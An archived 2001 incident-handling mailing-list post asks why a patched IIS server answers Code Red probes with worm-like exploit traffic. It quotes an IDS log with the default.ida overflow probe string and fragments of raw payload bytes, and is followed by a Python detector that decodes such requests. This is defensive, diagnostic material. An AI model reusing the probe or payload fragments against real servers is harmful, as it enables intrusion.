Appeal for Help. NOT Code Red But Is It?

From: Lindley, Patrick@HHSDC (Patrick@HHSDC)
Date: Mon Aug 13 2001 - 13:41:49 PDT


    Anybody know of a similar problem? Is this Code Red or something else? Does
    anybody know WHY this would happen?
    
    For the past 13 days we have been experiencing an unusual occurrence.  Every
    time a particular patched NT 4.0 server of ours running IIS 4 is probed by a
    Code Red infected system, our server immediately responds back to the prober
    by attempting to exploit the vulnerability on that system.
    
    Example:  158.42.25.98 sends the "/default.ida?" string followed by the "X"
    or "N" string (depending on the Code Red version) and our system immediately
    sends back the corresponding hack such as the HTML used in Code Red (Hacked
    By Chinese!) or attempts to execute or drop D:EXPLORER.EXE on the attacking
    system.
    
    Our IDS logs and HTTP logs confirm these events. Our system in question does
    not react as if it is infected with Code Red (i.e. continuously probing
    other IP addresses) and as a matter of fact we have confirmed the MS patch
    installation, run Trend Micro Systems anti-virus software on it, rebooted
    it, and manually scanned for the tell-tale signs of Code Red infection.  It
    only sends out this Code Red-like activity when it is probed.
    
    I've included a copy of one entry from our IDS below.  Inbound port was 80
    and outbound port was 2913. Context incoming is the data that was sent to us
    (for instance from 158.42.25.98) and context outgoing is what our server
    sent back.
    
               Ports: 80 -> 2913
       Context Match: [/]default[.]ida[?][a-zA-Z0-9]+%u
    Context Incoming:
    ://***.***.***.***/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    XXXXXXXXXXXXXXXXXXXXXXXXXXX%u
    
    Context Outgoing:
    \FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\
    FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\F
    C\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC
    \FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\FC\00\00\00\
    00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00^\BF\B9\05\00\00j\07\E8
    \10\00\00\00d:
    
    explorer.exe\00\8B\04
    $\88\18\FFU\CC\83\F8\FFtM\89\85L\FE\FF\FF\AC\8A\F88>u'j
    \E8#\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00
    \00\00\00\00\00\00\00\00\00\00\00j\01V\FF\B5L\FE\FF\FF\FFU\C8FOu\C5\FF\B5L\F
    E\FF\FF\FFU\C4\FE\C3\80\FBd\0F\86L\F9\FF\FF\C3a\C9\C2\04\00\0
    
    ===========================
    J. Patrick Lindley
    Assistant IT Security Manager
    Planning & Consulting Division
    1651 Alhambra Blvd.
    Sacramento, CA 95816
    916-739-7976
    
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
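The probe pattern described in the post (a GET for /default.ida? followed by a long run of "N" or "X" filler and then %u escapes, which is what the IDS context match `[/]default[.]ida[?][a-zA-Z0-9]+%u` keys on) is easy to check for in HTTP logs. The following is an added example, not code from the post or from the IDS product it quotes: it classifies request lines by the filler character, and decodes the %uXXXX escapes into the bytes the idq.dll ISAPI filter would have produced, so the start of the overflow payload can be inspected. The request lines and client addresses are constructed sample input, and the short %u sequence in them is a stand-in for the worm's real payload, not a copy of it.

```python
import re
from typing import List, Optional, Tuple

# Equivalent of the IDS context match quoted in the post:
# "/default.ida?" + a run of alphanumerics + a %u escape.
CODE_RED_RE = re.compile(r"/default\.ida\?([A-Za-z0-9]+)%u", re.IGNORECASE)


def classify_code_red(request_line: str) -> Optional[str]:
    """Return a label for a Code Red style probe, or None if the line does not match.

    The filler character distinguishes the variants the post mentions:
    'N' filler -> "CodeRed-N", 'X' filler -> "CodeRed-X", anything else -> "CodeRed-other".
    """
    m = CODE_RED_RE.search(request_line)
    if not m:
        return None
    filler_chars = set(m.group(1))
    if filler_chars == {"N"}:
        return "CodeRed-N"
    if filler_chars == {"X"}:
        return "CodeRed-X"
    return "CodeRed-other"


def _is_hex(s: str) -> bool:
    return len(s) > 0 and all(c in "0123456789abcdefABCDEF" for c in s)


def decode_percent_u(s: str) -> bytes:
    """Decode %uXXXX and %XX escapes; other characters pass through as Latin-1.

    A %uXXXX escape is treated as one 16-bit code unit emitted little-endian,
    which is how the wide-character conversion turned the URL into payload bytes.
    """
    out = bytearray()
    i, n = 0, len(s)
    while i < n:
        if s[i] == "%" and i + 6 <= n and s[i + 1] in "uU" and _is_hex(s[i + 2:i + 6]):
            out += int(s[i + 2:i + 6], 16).to_bytes(2, "little")
            i += 6
        elif s[i] == "%" and i + 3 <= n and _is_hex(s[i + 1:i + 3]):
            out.append(int(s[i + 1:i + 3], 16))
            i += 3
        else:
            out += s[i].encode("latin-1", "replace")
            i += 1
    return bytes(out)


def exploit_bytes(request_line: str) -> bytes:
    """Return the decoded query string of a matching request (filler plus payload bytes)."""
    m = CODE_RED_RE.search(request_line)
    if not m:
        return b""
    query = request_line[m.start() + len("/default.ida?"):].split(" ", 1)[0]
    return decode_percent_u(query)


def scan(requests: List[Tuple[str, str]]) -> List[Tuple[str, str]]:
    """Run the classifier over (client_ip, request_line) pairs; return the hits."""
    hits = []
    for client_ip, line in requests:
        label = classify_code_red(line)
        if label is not None:
            hits.append((client_ip, label))
    return hits


# Constructed sample log lines (hypothetical addresses from the TEST-NET range).
# The %u sequence is a short stand-in, not the worm's actual payload.
SAMPLE_REQUESTS = [
    ("203.0.113.7", "GET /default.ida?" + "N" * 224 + "%u9090%u6858 HTTP/1.0"),
    ("203.0.113.8", "GET /default.ida?" + "X" * 224 + "%u9090%u6858 HTTP/1.0"),
    ("203.0.113.9", "GET /index.html HTTP/1.0"),
    ("203.0.113.10", "GET /default.ida?AAAA HTTP/1.0"),  # no %u escape: not a match
]

if __name__ == "__main__":
    for ip, label in scan(SAMPLE_REQUESTS):
        print(ip, label)
    print(exploit_bytes(SAMPLE_REQUESTS[0][1])[-4:].hex())
```

Only the two lines with both the filler run and a %u escape are reported, matching the IDS signature; a truncated probe without %u is ignored, which is the same gap the quoted context match has.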
    



    This archive was generated by hypermail 2b30 : Mon Aug 13 2001 - 15:10:08 PDT